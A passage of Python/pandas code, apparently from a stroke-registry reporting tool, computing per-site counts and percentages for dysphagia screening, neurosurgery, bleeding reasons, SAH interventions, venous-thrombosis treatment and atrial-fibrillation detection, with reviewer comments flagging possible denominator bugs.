    # another centre, and the % uses the full (minus "not known") cohort.
    self.statsDf['# dysphagia screening done'] = self.statsDf['# dysphagia screening - Guss test'] + self.statsDf['# dysphagia screening - Other test'] + self.statsDf['# dysphagia screening - Another centre']
    self.statsDf['% dysphagia screening done'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening done']/(x['is_ich_cvt_patients'] - x['# dysphagia screening - not known'])) * 100), 2) if (x['is_ich_cvt_patients'] - x['# dysphagia screening - not known']) > 0 else 0, axis=1)
# end::dysphagia_screening[]
############################
# DYSPHAGIA SCREENING TIME #
############################
# Timing of the dysphagia screen, computed over all patients (self.df).
# DYSPHAGIA_SCREENING_TIME: 1 = within first 24 hours, 2 = after first 24 hours.
self.tmp = self.df.groupby(['Protocol ID', 'DYSPHAGIA_SCREENING_TIME']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING_TIME", value=1, new_column_name='# dysphagia screening time - Within first 24 hours')
self.statsDf = self._get_values_for_factors(column_name="DYSPHAGIA_SCREENING_TIME", value=2, new_column_name='# dysphagia screening time - After first 24 hours')
# Percentages use only patients with a recorded screening time (within + after)
# as the denominator, not the whole cohort.
self.statsDf['% dysphagia screening time - Within first 24 hours'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening time - Within first 24 hours']/(x['# dysphagia screening time - Within first 24 hours'] + x['# dysphagia screening time - After first 24 hours'])) * 100), 2) if (x['# dysphagia screening time - Within first 24 hours'] + x['# dysphagia screening time - After first 24 hours']) > 0 else 0, axis=1)
self.statsDf['% dysphagia screening time - After first 24 hours'] = self.statsDf.apply(lambda x: round(((x['# dysphagia screening time - After first 24 hours']/(x['# dysphagia screening time - Within first 24 hours'] + x['# dysphagia screening time - After first 24 hours'])) * 100), 2) if (x['# dysphagia screening time - Within first 24 hours'] + x['# dysphagia screening time - After first 24 hours']) > 0 else 0, axis=1)
###################
# HEMICRANIECTOMY #
###################
# Hemicraniectomy among ischemic-stroke patients.
# HEMICRANIECTOMY: 1 = Yes, 2 = No, 3 = Referred to another centre.
# Denominator is all ischemic patients (no "not known" subtraction here,
# unlike the dysphagia/neurosurgery sections).
self.tmp = isch.groupby(['Protocol ID', 'HEMICRANIECTOMY']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="HEMICRANIECTOMY", value=1, new_column_name='# hemicraniectomy - Yes')
self.statsDf['% hemicraniectomy - Yes'] = self.statsDf.apply(lambda x: round(((x['# hemicraniectomy - Yes']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="HEMICRANIECTOMY", value=2, new_column_name='# hemicraniectomy - No')
self.statsDf['% hemicraniectomy - No'] = self.statsDf.apply(lambda x: round(((x['# hemicraniectomy - No']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="HEMICRANIECTOMY", value=3, new_column_name='# hemicraniectomy - Referred to another centre')
self.statsDf['% hemicraniectomy - Referred to another centre'] = self.statsDf.apply(lambda x: round(((x['# hemicraniectomy - Referred to another centre']/x['isch_patients']) * 100), 2) if x['isch_patients'] > 0 else 0, axis=1)
################
# NEUROSURGERY #
################
# Neurosurgery among ICH patients.
# NEUROSURGERY: 1 = Yes, 2 = No, 3 = Not known. "Not known" is excluded from
# the Yes/No denominators.
self.tmp = ich.groupby(['Protocol ID', 'NEUROSURGERY']).size().to_frame('count').reset_index()
self.statsDf = self._get_values_for_factors(column_name="NEUROSURGERY", value=3, new_column_name='# neurosurgery - Not known')
self.statsDf['% neurosurgery - Not known'] = self.statsDf.apply(lambda x: round(((x['# neurosurgery - Not known']/x['ich_patients']) * 100), 2) if x['ich_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="NEUROSURGERY", value=1, new_column_name='# neurosurgery - Yes')
self.statsDf['% neurosurgery - Yes'] = self.statsDf.apply(lambda x: round(((x['# neurosurgery - Yes']/(x['ich_patients'] - x['# neurosurgery - Not known'])) * 100), 2) if (x['ich_patients'] - x['# neurosurgery - Not known']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors(column_name="NEUROSURGERY", value=2, new_column_name='# neurosurgery - No')
self.statsDf['% neurosurgery - No'] = self.statsDf.apply(lambda x: round(((x['# neurosurgery - No']/(x['ich_patients'] - x['# neurosurgery - Not known'])) * 100), 2) if (x['ich_patients'] - x['# neurosurgery - Not known']) > 0 else 0, axis=1)
#####################
# NEUROSURGERY TYPE #
#####################
# Type of neurosurgery among ICH patients who had neurosurgery (NEUROSURGERY == 1).
# NEUROSURGERY_TYPE: 1 = intracranial hematoma evacuation, 2 = external
# ventricular drainage, 3 = decompressive craniectomy, 4 = referred to
# another centre.
# Create temporary dataframe of patients who have undergone neurosurgery
neurosurgery = ich[ich['NEUROSURGERY'].isin([1])].copy()
if neurosurgery.empty:
    # If no data available set 0 to all variables
    # (skipping the groupby keeps _get_values_for_factors from seeing an
    # empty self.tmp).
    self.statsDf['neurosurgery_patients'] = 0
    self.statsDf['# neurosurgery type - intracranial hematoma evacuation'] = 0
    self.statsDf['% neurosurgery type - intracranial hematoma evacuation'] = 0
    self.statsDf['# neurosurgery type - external ventricular drainage'] = 0
    self.statsDf['% neurosurgery type - external ventricular drainage'] = 0
    self.statsDf['# neurosurgery type - decompressive craniectomy'] = 0
    self.statsDf['% neurosurgery type - decompressive craniectomy'] = 0
    self.statsDf['# neurosurgery type - Referred to another centre'] = 0
    self.statsDf['% neurosurgery type - Referred to another centre'] = 0
else:
    self.tmp = neurosurgery.groupby(['Protocol ID', 'NEUROSURGERY_TYPE']).size().to_frame('count').reset_index()
    self.statsDf['neurosurgery_patients'] = self._count_patients(dataframe=neurosurgery)
    self.statsDf = self._get_values_for_factors(column_name="NEUROSURGERY_TYPE", value=1, new_column_name='# neurosurgery type - intracranial hematoma evacuation')
    self.statsDf['% neurosurgery type - intracranial hematoma evacuation'] = self.statsDf.apply(lambda x: round(((x['# neurosurgery type - intracranial hematoma evacuation']/x['neurosurgery_patients']) * 100), 2) if x['neurosurgery_patients'] > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="NEUROSURGERY_TYPE", value=2, new_column_name='# neurosurgery type - external ventricular drainage')
    self.statsDf['% neurosurgery type - external ventricular drainage'] = self.statsDf.apply(lambda x: round(((x['# neurosurgery type - external ventricular drainage']/x['neurosurgery_patients']) * 100), 2) if x['neurosurgery_patients'] > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="NEUROSURGERY_TYPE", value=3, new_column_name='# neurosurgery type - decompressive craniectomy')
    self.statsDf['% neurosurgery type - decompressive craniectomy'] = self.statsDf.apply(lambda x: round(((x['# neurosurgery type - decompressive craniectomy']/x['neurosurgery_patients']) * 100), 2) if x['neurosurgery_patients'] > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="NEUROSURGERY_TYPE", value=4, new_column_name='# neurosurgery type - Referred to another centre')
    self.statsDf['% neurosurgery type - Referred to another centre'] = self.statsDf.apply(lambda x: round(((x['# neurosurgery type - Referred to another centre']/x['neurosurgery_patients']) * 100), 2) if x['neurosurgery_patients'] > 0 else 0, axis=1)
# Free the temporary frame; this method builds many of them.
del neurosurgery
###################
# BLEEDING REASON #
###################
# Bleeding reason among ICH patients. BLEEDING_REASON is a multi-select
# stored as a comma-separated string (e.g. "1,4"), hence the cast to str and
# the *_containing matcher; -999 marks records from an older form version
# that lacked this question.
self.tmp = ich.groupby(['Protocol ID', 'BLEEDING_REASON']).size().to_frame('count').reset_index()
self.tmp['BLEEDING_REASON'] = self.tmp['BLEEDING_REASON'].astype(str)
# Get number of patients entered in older form
self.statsDf = self._get_values_for_factors(column_name="BLEEDING_REASON", value='-999', new_column_name='tmp')
self.statsDf = self._get_values_for_factors_containing(column_name="BLEEDING_REASON", value='1', new_column_name='# bleeding reason - arterial hypertension')
self.statsDf['% bleeding reason - arterial hypertension'] = self.statsDf.apply(lambda x: round(((x['# bleeding reason - arterial hypertension']/(x['ich_patients'] - x['tmp'])) * 100), 2) if (x['ich_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="BLEEDING_REASON", value="2", new_column_name='# bleeding reason - aneurysm')
self.statsDf['% bleeding reason - aneurysm'] = self.statsDf.apply(lambda x: round(((x['# bleeding reason - aneurysm']/(x['ich_patients'] - x['tmp'])) * 100), 2) if (x['ich_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="BLEEDING_REASON", value="3", new_column_name='# bleeding reason - arterio-venous malformation')
self.statsDf['% bleeding reason - arterio-venous malformation'] = self.statsDf.apply(lambda x: round(((x['# bleeding reason - arterio-venous malformation']/(x['ich_patients'] - x['tmp'])) * 100), 2) if (x['ich_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="BLEEDING_REASON", value="4", new_column_name='# bleeding reason - anticoagulation therapy')
self.statsDf['% bleeding reason - anticoagulation therapy'] = self.statsDf.apply(lambda x: round(((x['# bleeding reason - anticoagulation therapy']/(x['ich_patients'] - x['tmp'])) * 100), 2) if (x['ich_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="BLEEDING_REASON", value="5", new_column_name='# bleeding reason - amyloid angiopathy')
self.statsDf['% bleeding reason - amyloid angiopathy'] = self.statsDf.apply(lambda x: round(((x['# bleeding reason - amyloid angiopathy']/(x['ich_patients'] - x['tmp'])) * 100), 2) if (x['ich_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="BLEEDING_REASON", value="6", new_column_name='# bleeding reason - Other')
self.statsDf['% bleeding reason - Other'] = self.statsDf.apply(lambda x: round(((x['# bleeding reason - Other']/(x['ich_patients'] - x['tmp'])) * 100), 2) if (x['ich_patients'] - x['tmp']) > 0 else 0, axis=1)
### DATA NORMALIZATION
# Multi-select answers can make the raw percentages sum past 100; rescale
# each category by the row total so the *_norm columns sum to 100.
norm_tmp = self.statsDf[['% bleeding reason - arterial hypertension', '% bleeding reason - aneurysm', '% bleeding reason - arterio-venous malformation', '% bleeding reason - anticoagulation therapy', '% bleeding reason - amyloid angiopathy', '% bleeding reason - Other']].copy()
norm_tmp.loc[:, 'rowsums'] = norm_tmp.sum(axis=1)
self.statsDf['bleeding_arterial_hypertension_perc_norm'] = ((norm_tmp['% bleeding reason - arterial hypertension']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['bleeding_aneurysm_perc_norm'] = ((norm_tmp['% bleeding reason - aneurysm']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['bleeding_arterio_venous_malformation_perc_norm'] = ((norm_tmp['% bleeding reason - arterio-venous malformation']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['bleeding_anticoagulation_therapy_perc_norm'] = ((norm_tmp['% bleeding reason - anticoagulation therapy']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['bleeding_amyloid_angiopathy_perc_norm'] = ((norm_tmp['% bleeding reason - amyloid angiopathy']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['bleeding_other_perc_norm'] = ((norm_tmp['% bleeding reason - Other']/norm_tmp['rowsums']) * 100).round(decimals=2)
del norm_tmp
# MORE THAN ONE POSSIBILITY
# A comma in the stored value means more than one reason was selected.
self.statsDf = self._get_values_for_factors_containing(column_name="BLEEDING_REASON", value=",", new_column_name='# bleeding reason - more than one')
self.statsDf['% bleeding reason - more than one'] = self.statsDf.apply(lambda x: round(((x['# bleeding reason - more than one']/(x['ich_patients'] - x['tmp'])) * 100), 2) if (x['ich_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf.drop(['tmp'], inplace=True, axis=1)
###################
# BLEEDING SOURCE #
###################
# Bleeding source among SAH patients. BLEEDING_SOURCE: 1 = Known,
# 2 = Not known; -999 marks records from an older form without this field
# and is subtracted from the denominator.
self.tmp = sah.groupby(['Protocol ID', 'BLEEDING_SOURCE']).size().to_frame('count').reset_index()
self.tmp['BLEEDING_SOURCE'] = self.tmp['BLEEDING_SOURCE'].astype(str)
# Get number of patients entered in older form
# self.statsDf = self._get_values_for_factors(column_name="BLEEDING_SOURCE", value='-999', new_column_name='tmp')
self.statsDf = self._get_values_for_factors_containing(column_name="BLEEDING_SOURCE", value='-999', new_column_name='tmp')
# self.statsDf = self._get_values_for_factors(column_name="BLEEDING_SOURCE", value='1', new_column_name='# bleeding source - Known')
self.statsDf = self._get_values_for_factors_containing(column_name="BLEEDING_SOURCE", value='1', new_column_name='# bleeding source - Known')
self.statsDf['% bleeding source - Known'] = self.statsDf.apply(lambda x: round(((x['# bleeding source - Known']/(x['sah_patients'] - x['tmp'])) * 100), 2) if (x['sah_patients'] - x['tmp']) > 0 else 0, axis=1)
# self.statsDf = self._get_values_for_factors(column_name="BLEEDING_SOURCE", value='2', new_column_name='# bleeding source - Not known')
self.statsDf = self._get_values_for_factors_containing(column_name="BLEEDING_SOURCE", value='2', new_column_name='# bleeding source - Not known')
self.statsDf['% bleeding source - Not known'] = self.statsDf.apply(lambda x: round(((x['# bleeding source - Not known']/(x['sah_patients'] - x['tmp'])) * 100), 2) if (x['sah_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf.drop(['tmp'], inplace=True, axis=1)
################
# INTERVENTION #
################
# Aneurysm intervention among SAH patients. INTERVENTION is a multi-select
# stored as a comma-separated string: 1 = coiling, 2 = clipping, 3 = other
# neurosurgical treatment, 4 = referred for intervention, 5/6 = none.
self.tmp = sah.groupby(['Protocol ID', 'INTERVENTION']).size().to_frame('count').reset_index()
self.tmp['INTERVENTION'] = self.tmp['INTERVENTION'].astype(str)
# Get number of patients entered in older form
# NOTE(review): value=-999 is an int although the column was just cast to
# str; the sibling BLEEDING_REASON/BLEEDING_SOURCE sections pass '-999' as a
# string. If _get_values_for_factors compares without coercion this never
# matches and older-form patients stay in the denominators — verify.
self.statsDf = self._get_values_for_factors(column_name="INTERVENTION", value=-999, new_column_name='tmp')
self.statsDf = self._get_values_for_factors_containing(column_name="INTERVENTION", value="1", new_column_name='# intervention - endovascular (coiling)')
self.statsDf['% intervention - endovascular (coiling)'] = self.statsDf.apply(lambda x: round(((x['# intervention - endovascular (coiling)']/(x['sah_patients'] - x['tmp'])) * 100), 2) if (x['sah_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="INTERVENTION", value="2", new_column_name='# intervention - neurosurgical (clipping)')
self.statsDf['% intervention - neurosurgical (clipping)'] = self.statsDf.apply(lambda x: round(((x['# intervention - neurosurgical (clipping)']/(x['sah_patients'] - x['tmp'])) * 100), 2) if (x['sah_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="INTERVENTION", value="3", new_column_name='# intervention - Other neurosurgical treatment (decompression, drainage)')
self.statsDf['% intervention - Other neurosurgical treatment (decompression, drainage)'] = self.statsDf.apply(lambda x: round(((x['# intervention - Other neurosurgical treatment (decompression, drainage)']/(x['sah_patients'] - x['tmp'])) * 100), 2) if (x['sah_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="INTERVENTION", value="4", new_column_name='# intervention - Referred to another hospital for intervention')
self.statsDf['% intervention - Referred to another hospital for intervention'] = self.statsDf.apply(lambda x: round(((x['# intervention - Referred to another hospital for intervention']/(x['sah_patients'] - x['tmp'])) * 100), 2) if (x['sah_patients'] - x['tmp']) > 0 else 0, axis=1)
# "5|6" — presumably a regex alternation matching either code as "none";
# confirm _get_values_for_factors_containing uses regex matching.
self.statsDf = self._get_values_for_factors_containing(column_name="INTERVENTION", value="5|6", new_column_name='# intervention - None / no intervention')
self.statsDf['% intervention - None / no intervention'] = self.statsDf.apply(lambda x: round(((x['# intervention - None / no intervention']/(x['sah_patients'] - x['tmp'])) * 100), 2) if (x['sah_patients'] - x['tmp']) > 0 else 0, axis=1)
### DATA NORMALIZATION
# Rescale the (possibly >100% in total, multi-select) percentages so the
# *_perc_norm columns sum to 100 per site.
norm_tmp = self.statsDf[['% intervention - endovascular (coiling)', '% intervention - neurosurgical (clipping)', '% intervention - Other neurosurgical treatment (decompression, drainage)', '% intervention - Referred to another hospital for intervention', '% intervention - None / no intervention']].copy()
norm_tmp.loc[:, 'rowsums'] = norm_tmp.sum(axis=1)
self.statsDf['intervention_endovascular_perc_norm'] = ((norm_tmp['% intervention - endovascular (coiling)']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['intervention_neurosurgical_perc_norm'] = ((norm_tmp['% intervention - neurosurgical (clipping)']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['intervention_other_perc_norm'] = ((norm_tmp['% intervention - Other neurosurgical treatment (decompression, drainage)']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['intervention_referred_perc_norm'] = ((norm_tmp['% intervention - Referred to another hospital for intervention']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['intervention_none_perc_norm'] = ((norm_tmp['% intervention - None / no intervention']/norm_tmp['rowsums']) * 100).round(decimals=2)
del norm_tmp
# A comma in the stored value means more than one intervention was selected.
self.statsDf = self._get_values_for_factors_containing(column_name="INTERVENTION", value=",", new_column_name='# intervention - more than one')
self.statsDf['% intervention - more than one'] = self.statsDf.apply(lambda x: round(((x['# intervention - more than one']/(x['sah_patients'] - x['tmp'])) * 100), 2) if (x['sah_patients'] - x['tmp']) > 0 else 0, axis=1)
self.statsDf.drop(['tmp'], inplace=True, axis=1)
################
# VT TREATMENT #
################
# Venous-thrombosis treatment among CVT patients. VT_TREATMENT is a
# multi-select stored as a comma-separated string: 1 = anticoagulation,
# 2 = thrombectomy, 3 = local thrombolysis, 4 = local neurological treatment.
# Guard: older exports may lack the column entirely; create it empty so the
# groupby below cannot raise KeyError.
if ('VT_TREATMENT' not in cvt.columns):
    cvt['VT_TREATMENT'] = np.nan
self.tmp = cvt.groupby(['Protocol ID', 'VT_TREATMENT']).size().to_frame('count').reset_index()
self.tmp[['VT_TREATMENT']] = self.tmp[['VT_TREATMENT']].astype(str)
self.statsDf = self._get_values_for_factors_containing(column_name="VT_TREATMENT", value="1", new_column_name='# VT treatment - anticoagulation')
self.statsDf['% VT treatment - anticoagulation'] = self.statsDf.apply(lambda x: round(((x['# VT treatment - anticoagulation']/x['cvt_patients']) * 100), 2) if x['cvt_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="VT_TREATMENT", value="2", new_column_name='# VT treatment - thrombectomy')
self.statsDf['% VT treatment - thrombectomy'] = self.statsDf.apply(lambda x: round(((x['# VT treatment - thrombectomy']/x['cvt_patients']) * 100), 2) if x['cvt_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="VT_TREATMENT", value="3", new_column_name='# VT treatment - local thrombolysis')
self.statsDf['% VT treatment - local thrombolysis'] = self.statsDf.apply(lambda x: round(((x['# VT treatment - local thrombolysis']/x['cvt_patients']) * 100), 2) if x['cvt_patients'] > 0 else 0, axis=1)
self.statsDf = self._get_values_for_factors_containing(column_name="VT_TREATMENT", value="4", new_column_name='# VT treatment - local neurological treatment')
self.statsDf['% VT treatment - local neurological treatment'] = self.statsDf.apply(lambda x: round(((x['# VT treatment - local neurological treatment']/x['cvt_patients']) * 100), 2) if x['cvt_patients'] > 0 else 0, axis=1)
# A comma in the stored value means more than one treatment was selected.
self.statsDf = self._get_values_for_factors_containing(column_name="VT_TREATMENT", value=",", new_column_name='# VT treatment - more than one treatment')
self.statsDf['% VT treatment - more than one treatment'] = self.statsDf.apply(lambda x: round(((x['# VT treatment - more than one treatment']/x['cvt_patients']) * 100), 2) if x['cvt_patients'] > 0 else 0, axis=1)
### DATA NORMALIZATION
# Rescale the multi-select percentages so the *_perc_norm columns sum to 100.
norm_tmp = self.statsDf[['% VT treatment - anticoagulation', '% VT treatment - thrombectomy', '% VT treatment - local thrombolysis', '% VT treatment - local neurological treatment']].copy()
norm_tmp.loc[:, 'rowsums'] = norm_tmp.sum(axis=1)
self.statsDf['vt_treatment_anticoagulation_perc_norm'] = ((norm_tmp['% VT treatment - anticoagulation']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['vt_treatment_thrombectomy_perc_norm'] = ((norm_tmp['% VT treatment - thrombectomy']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['vt_treatment_local_thrombolysis_perc_norm'] = ((norm_tmp['% VT treatment - local thrombolysis']/norm_tmp['rowsums']) * 100).round(decimals=2)
self.statsDf['vt_treatment_local_neurological_treatment_perc_norm'] = ((norm_tmp['% VT treatment - local neurological treatment']/norm_tmp['rowsums']) * 100).round(decimals=2)
del norm_tmp
########
# AFIB #
########
# Atrial fibrillation/flutter status among IS/TIA patients.
# AFIB_FLUTTER: 1 = Known, 2 = Newly-detected at admission, 3 = Detected
# during hospitalization, 4 = Not detected, 5 = Not known. Patients referred
# on to another centre are excluded from the denominators (CZ uses a
# different referral definition from everyone else).
# NOTE(review): the two branches differ only in how "referred" is defined —
# a candidate for extraction into a helper. Variable name 'reffered' [sic]
# is kept as-is.
# tag::afib[]
if country_code == 'CZ':
    # CZ: referred = CZ IVT/TBY form with RECANALIZATION_PROCEDURES 5, 6 or 8.
    not_reffered = is_tia.loc[~(is_tia['crf_parent_name'].isin(['F_RESQ_IVT_TBY_CZ_4']) & is_tia['RECANALIZATION_PROCEDURES'].isin([5,6,8]))].copy()
    self.statsDf['not_reffered_patients'] = self._count_patients(dataframe=not_reffered)
    # Create dataframe with the patients referred to another hospital
    reffered = is_tia[is_tia['RECANALIZATION_PROCEDURES'].isin([5,6,8])].copy()
    self.statsDf['reffered_patients'] = self._count_patients(dataframe=reffered)
    self.tmp = not_reffered.groupby(['Protocol ID', 'AFIB_FLUTTER']).size().to_frame('count').reset_index()
    self.statsDf = self._get_values_for_factors(column_name="AFIB_FLUTTER", value=1, new_column_name='# afib/flutter - Known')
    self.statsDf['% afib/flutter - Known'] = self.statsDf.apply(lambda x: round(((x['# afib/flutter - Known']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="AFIB_FLUTTER", value=2, new_column_name='# afib/flutter - Newly-detected at admission')
    self.statsDf['% afib/flutter - Newly-detected at admission'] = self.statsDf.apply(lambda x: round(((x['# afib/flutter - Newly-detected at admission']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="AFIB_FLUTTER", value=3, new_column_name='# afib/flutter - Detected during hospitalization')
    self.statsDf['% afib/flutter - Detected during hospitalization'] = self.statsDf.apply(lambda x: round(((x['# afib/flutter - Detected during hospitalization']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="AFIB_FLUTTER", value=4, new_column_name='# afib/flutter - Not detected')
    self.statsDf['% afib/flutter - Not detected'] = self.statsDf.apply(lambda x: round(((x['# afib/flutter - Not detected']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="AFIB_FLUTTER", value=5, new_column_name='# afib/flutter - Not known')
    self.statsDf['% afib/flutter - Not known'] = self.statsDf.apply(lambda x: round(((x['# afib/flutter - Not known']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
    # "Detected" = newly-detected at admission + detected during hospitalization.
    self.statsDf['afib_flutter_detected_only'] = self.statsDf['# afib/flutter - Newly-detected at admission'] + self.statsDf['# afib/flutter - Detected during hospitalization']
    self.statsDf['% patients detected for aFib'] = self.statsDf.apply(lambda x: round(((x['afib_flutter_detected_only']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
else:
    # Non-CZ: referred = RECANALIZATION_PROCEDURES == 7.
    not_reffered = is_tia[~is_tia['RECANALIZATION_PROCEDURES'].isin([7])].copy()
    self.statsDf['not_reffered_patients'] = self._count_patients(dataframe=not_reffered)
    # Create dataframe with the patients referred to another hospital
    reffered = is_tia[is_tia['RECANALIZATION_PROCEDURES'].isin([7])].copy()
    self.statsDf['reffered_patients'] = self._count_patients(dataframe=reffered)
    self.tmp = not_reffered.groupby(['Protocol ID', 'AFIB_FLUTTER']).size().to_frame('count').reset_index()
    self.statsDf = self._get_values_for_factors(column_name="AFIB_FLUTTER", value=1, new_column_name='# afib/flutter - Known')
    self.statsDf['% afib/flutter - Known'] = self.statsDf.apply(lambda x: round(((x['# afib/flutter - Known']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="AFIB_FLUTTER", value=2, new_column_name='# afib/flutter - Newly-detected at admission')
    self.statsDf['% afib/flutter - Newly-detected at admission'] = self.statsDf.apply(lambda x: round(((x['# afib/flutter - Newly-detected at admission']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="AFIB_FLUTTER", value=3, new_column_name='# afib/flutter - Detected during hospitalization')
    self.statsDf['% afib/flutter - Detected during hospitalization'] = self.statsDf.apply(lambda x: round(((x['# afib/flutter - Detected during hospitalization']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="AFIB_FLUTTER", value=4, new_column_name='# afib/flutter - Not detected')
    self.statsDf['% afib/flutter - Not detected'] = self.statsDf.apply(lambda x: round(((x['# afib/flutter - Not detected']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
    self.statsDf = self._get_values_for_factors(column_name="AFIB_FLUTTER", value=5, new_column_name='# afib/flutter - Not known')
    self.statsDf['% afib/flutter - Not known'] = self.statsDf.apply(lambda x: round(((x['# afib/flutter - Not known']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
    # "Detected" = newly-detected at admission + detected during hospitalization.
    self.statsDf['afib_flutter_detected_only'] = self.statsDf['# afib/flutter - Newly-detected at admission'] + self.statsDf['# afib/flutter - Detected during hospitalization']
    self.statsDf['% patients detected for aFib'] = self.statsDf.apply(lambda x: round(((x['afib_flutter_detected_only']/(x['is_tia_patients'] - x['reffered_patients'])) * 100), 2) if (x['is_tia_patients'] - x['reffered_patients']) > 0 else 0, axis=1)
# end::afib[]
#########################
# AFIB DETECTION METHOD #
#########################
# Denominator: patients whose aFib was detected during hospitalization
# (AFIB_FLUTTER == 3).  The CZ and non-CZ paths differ only in how a factor
# value is matched: CZ uses substring matching on string values (presumably
# because the CZ form allows multi-valued answers — TODO confirm), everywhere
# else an exact integer match is used.  The common setup is shared here.
afib_detected_during_hospitalization = not_reffered[not_reffered['AFIB_FLUTTER'].isin([3])].copy()
self.statsDf['afib_detected_during_hospitalization_patients'] = self._count_patients(dataframe=afib_detected_during_hospitalization)
# Convert values to string (done identically on both paths in the original).
afib_detected_during_hospitalization['AFIB_DETECTION_METHOD'] = afib_detected_during_hospitalization['AFIB_DETECTION_METHOD'].astype(str)
self.tmp = afib_detected_during_hospitalization.groupby(['Protocol ID', 'AFIB_DETECTION_METHOD']).size().to_frame('count').reset_index()

for method_value, method_label in (
        (1, 'Telemetry with monitor allowing automatic detection of aFib'),
        (2, 'Telemetry without monitor allowing automatic detection of aFib'),
        (3, 'Holter-type monitoring'),
        (4, 'EKG monitoring in an ICU bed with automatic detection of aFib'),
        (5, 'EKG monitoring in an ICU bed without automatic detection of aFib')):
    count_column = '# afib detection method - ' + method_label
    if country_code == 'CZ':
        self.statsDf = self._get_values_for_factors_containing(column_name="AFIB_DETECTION_METHOD", value=str(method_value), new_column_name=count_column)
    else:
        self.statsDf = self._get_values_for_factors(column_name="AFIB_DETECTION_METHOD", value=method_value, new_column_name=count_column)
    self.statsDf['% afib detection method - ' + method_label] = self.statsDf.apply(
        lambda x, c=count_column: round((x[c] / x['afib_detected_during_hospitalization_patients']) * 100, 2)
        if x['afib_detected_during_hospitalization_patients'] > 0 else 0,
        axis=1)
###############################
# AFIB OTHER DETECTION METHOD #
###############################
# Denominator: patients whose aFib was not detected or not known
# (AFIB_FLUTTER in {4, 5}).
afib_not_detected_or_not_known = not_reffered[not_reffered['AFIB_FLUTTER'].isin([4, 5])].copy()
self.statsDf['afib_not_detected_or_not_known_patients'] = self._count_patients(dataframe=afib_not_detected_or_not_known)
self.tmp = afib_not_detected_or_not_known.groupby(['Protocol ID', 'AFIB_OTHER_RECS']).size().to_frame('count').reset_index()
for recs_value, recs_label in ((1, 'Yes'), (2, 'Not detected or not known')):
    count_column = '# other afib detection method - ' + recs_label
    self.statsDf = self._get_values_for_factors(column_name="AFIB_OTHER_RECS", value=recs_value, new_column_name=count_column)
    self.statsDf['% other afib detection method - ' + recs_label] = self.statsDf.apply(
